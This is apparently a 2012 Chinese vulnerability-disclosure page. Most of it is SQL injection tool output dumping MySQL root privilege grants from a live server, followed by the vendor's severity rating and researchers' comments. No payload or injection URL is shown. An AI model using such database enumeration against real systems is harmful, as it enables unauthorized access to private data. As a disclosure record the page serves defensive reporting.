PRIVILEGE_TYPE=DROPTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=ALTERTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=TRIGGERTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=DELETETurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=DELETETurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=ALTERTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=SHUTDOWNTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=SHOW VIEWTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=LOCK TABLESTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=EVENTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=SHUTDOWNTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=ALTER ROUTINETurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=LOCK TABLESTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=INDEXTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=FILETurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=CREATETurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=EXECUTETurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=INDEXTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=RELOADTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=CREATE VIEWTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=CREATE TEMPORARY TABLESTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=CREATE USERTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=CREATE USERTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=INSERTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=CREATE TEMPORARY TABLESTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=REFERENCESTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=CREATE USERTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=REPLICATION CLIENTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=INSERTTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=EVENTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=DROPTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=REPLICATION CLIENTTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=SUPERTurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=SHUTDOWNTurning off 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'127.0.0.1'Data Found: IS_GRANTABLE=YESData Found: PRIVILEGE_TYPE=ALTER ROUTINETurning on 'bypass illegal union' and retrying!Data Found: TABLE_CATALOG=Data Found: GRANTEE='root'@'localhost'
加强安全体系,这样的血案还是比较典型啊!
危害等级:高
漏洞Rank:20
确认时间:2012-05-31 11:26
给20分感谢,感谢熬夜找漏洞~
2012-05-31:另外提示下,此域名非百度域名,非管辖范围内
哈哈,洞主强大。
顶
这个只是百伯,其实不算是百度的
哈哈!就这么想当二爷?拼老命了!如果你这个有那个问题的服务器集群多且是核心业务,我支持给你加精!
楼上争起来了,围观。
@shine 各种服务器指定的数据库表跑出来了。很明显了哥。
打错字了。妈呀,发移动主站去了。
@zeracker 难道比影响到整个核心业务应用厉害?
强大!
@zeracker 哈哈!让让你当当二爷,过过瘾吧!
@shine %>_<%。。。我会被喷死的。。各种喷吧。
@Jannock 带头大哥说了,每次都是不小心,昨天我也是不小心的。真的。
@百度 你不能这样捏?
哎,都不承认大问题。
最新状态:2012-05-31:另外提示下,此域名非百度域名,非管辖范围内
20是安慰你弱小的小心灵的呢,现在的各种2.
一个一个的好凶残~~
@gainover 各种精华,各种羡慕嫉妒恨
havij 在WIN7 不能用啊